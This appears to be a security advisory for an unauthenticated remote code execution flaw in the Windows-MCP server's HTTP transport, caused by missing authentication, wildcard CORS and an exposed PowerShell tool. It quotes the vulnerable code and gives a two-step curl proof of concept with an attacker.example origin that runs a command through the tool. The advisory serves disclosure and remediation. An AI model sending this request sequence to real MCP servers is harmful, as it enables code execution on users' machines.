GHSA-vrxg-gm77-7q5g: Unauthenticated Remote Code Execution in Windows-MCP HTTP Transport

Windows-MCP is a Model Context Protocol (MCP) server implementation for Windows, designed to provide AI tools and external services with local execution capabilities. The package provides multiple transport mechanisms to interact with the underlying FastMCP application, including standard input/output (stdio), Server-Sent Events (SSE), and Streamable HTTP transports.

The vulnerability, identified as GHSA-vrxg-gm77-7q5g, exists in the network-based transport modes (SSE and Streamable HTTP). When these modes are utilized, the server binds to a local port (default 8000) and processes incoming HTTP requests to manage the MCP session. In versions prior to 0.7.5, the server implementation fails to enforce any authentication mechanism on this interface.

Compounding the missing authentication is the deployment of a highly permissive Cross-Origin Resource Sharing (CORS) policy. The server's middleware explicitly permits cross-origin requests from any domain. Because the server also exposes a high-privilege PowerShell tool meant for local automation, a remote attacker can abuse a user's web browser to send cross-origin requests to the local server. This interaction successfully invokes the exposed PowerShell environment, resulting in unauthenticated remote code execution as the user running the server process.

The vulnerability materializes through the confluence of three specific configuration and design errors in the HTTP transport entry points. The primary failure is the omission of authentication requirements. The FastMCP instance, which handles the core protocol logic, is instantiated without defining an authentication provider. Consequently, any client capable of establishing a TCP connection to the bound port can initialize an MCP session.

The secondary failure involves the CORS configuration. In src/windows_mcp/__main__.py (lines 37-42), the application installs CORSMiddleware using allow_origins=["*"]. This wildcard directive instructs the victim's web browser to permit cross-origin asynchronous requests (via fetch or XMLHttpRequest) from any external website to the local MCP server. This completely neutralizes the Same-Origin Policy (SOP), which is the browser's primary defense against local service exploitation.

The tertiary failure is the unchecked exposure of a system-level execution tool. In src/windows_mcp/tools/shell.py (lines 10-24), the server registers a PowerShell tool. The execution logic for this tool (src/windows_mcp/desktop/powershell.py, lines 176-204) blindly passes the user-supplied command argument to PowerShell.exe -EncodedCommand without validating the caller's authorization.

The vulnerable execution path begins with the application's ASGI middleware configuration. The following code demonstrates the implementation of the wildcard CORS policy that allows the browser exploitation vector.

# Vulnerable implementation in src/windows_mcp/__main__.py (lines 37-42)
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],  # VULNERABLE: Wildcard origin permits any site
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)

Following the middleware, the FastMCP server object is initialized. In the affected versions, the initialization logic (src/windows_mcp/__main__.py, lines 75-113) lacks parameters or configurations to enforce API keys or token-based access control. The HTTP transport handlers map directly to the FastMCP execution routines, passing raw JSON-RPC payloads into the system.

The execution of the payload concludes in the PowerShell tool definition. The tool accepts arbitrary string input and prepares it for execution. Because the system assumes trust over the network boundary, the execution proceeds unconditionally.

# Vulnerable execution logic summary
def execute_powershell(command: str):
    # The command parameter is derived directly from the unauthenticated JSON-RPC request
    encoded = base64.b64encode(command.encode('utf-16le')).decode('utf-8')
    subprocess.run(["powershell.exe", "-EncodedCommand", encoded])

The fix introduced in version 0.7.5 resolves these issues by introducing mandatory parameters for network deployments. The --auth-key flag ensures that the FastMCP instance requires a valid bearer token for all operations. Simultaneously, the --cors-origins flag replaces the wildcard wildcard entry with explicit, user-defined trusted domains, restoring the SOP protections.

Exploitation of this vulnerability requires the attacker to send a sequence of valid MCP JSON-RPC messages to the exposed HTTP endpoint. The most common attack vector is a drive-by compromise. An attacker crafts a malicious website containing JavaScript that executes asynchronous HTTP requests against http://127.0.0.1:8000/mcp/.

The exploitation process consists of two primary phases: session initialization and tool invocation. The attacker first sends a POST request with the initialize method to negotiate a session. The server responds with a valid mcp-session-id. Due to the wildcard CORS policy, the browser passes the preflight OPTIONS check and allows the malicious script to read this session ID from the response.

# Phase 1: Initialize MCP Session
curl -i -s 'http://127.0.0.1:8000/mcp' \
  -H 'Origin: https://attacker.example' \
  -H 'Content-Type: application/json' \
  -H 'Accept: application/json, text/event-stream' \
  --data '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{},"clientInfo":{"name":"exploit-client","version":"1"}}}'

Using the acquired session ID, the attacker sends a secondary POST request invoking the tools/call method. The parameters specify the PowerShell tool and supply an arbitrary operating system command. The server processes this request without secondary authorization and executes the payload.

# Phase 2: Execute Arbitrary Command
curl -i -s 'http://127.0.0.1:8000/mcp' \
  -H 'Origin: https://attacker.example' \
  -H 'Mcp-Session-Id: [SESSION_ID_HERE]' \
  -H 'Content-Type: application/json' \
  -H 'Accept: application/json, text/event-stream' \
  --data '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"PowerShell","arguments":{"command":"calc.exe","timeout":30}}}'

The vulnerability carries a CVSS v4.0 base score of 8.7 (High), reflecting its severe impact and minimal exploitation prerequisites. The flaw permits complete circumvention of system authorization controls. An attacker successfully exploiting this vulnerability gains the ability to execute arbitrary commands with the privileges of the user running the Windows-MCP service.

The vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P specifies a network attack vector (AV:N) with low complexity (AC:L) and no privilege requirements (PR:N). While the typical attack scenario involves a drive-by web exploit, the vulnerability also exposes the system directly to adjacent network segments if the server binds to 0.0.0.0 instead of localhost.

In practical terms, this execution context allows the attacker to install malware, exfiltrate sensitive developer credentials, deploy ransomware, or establish persistent remote access. The exposure of development environments is particularly critical, as these machines frequently hold valuable intellectual property, SSH keys, and production API tokens.

The primary remediation for this vulnerability is updating the windows-mcp package to version 0.7.5 or later. The patch introduces robust security controls for the HTTP transport mechanisms. System administrators and developers must ensure that any active instances of the server are restarted after applying the update.

If the HTTP transport is required, administrators must explicitly configure the newly implemented security features. The server must be started with the --auth-key parameter to enforce token-based authentication for all incoming requests. Additionally, the --cors-origins parameter must be used to restrict access to a predefined list of trusted domains, explicitly preventing broad browser-based exploitation.

# Secure deployment example
python -m windows_mcp --transport http --auth-key "secure_random_token" --cors-origins "https://trusted.ai-application.com"

For deployments where network access is not strictly necessary, operators should utilize the standard input/output (stdio) transport mode. The stdio mode operates over OS-level pipes, implicitly relying on the operating system's process boundary controls. This inherently mitigates the network and browser-based attack vectors associated with this vulnerability.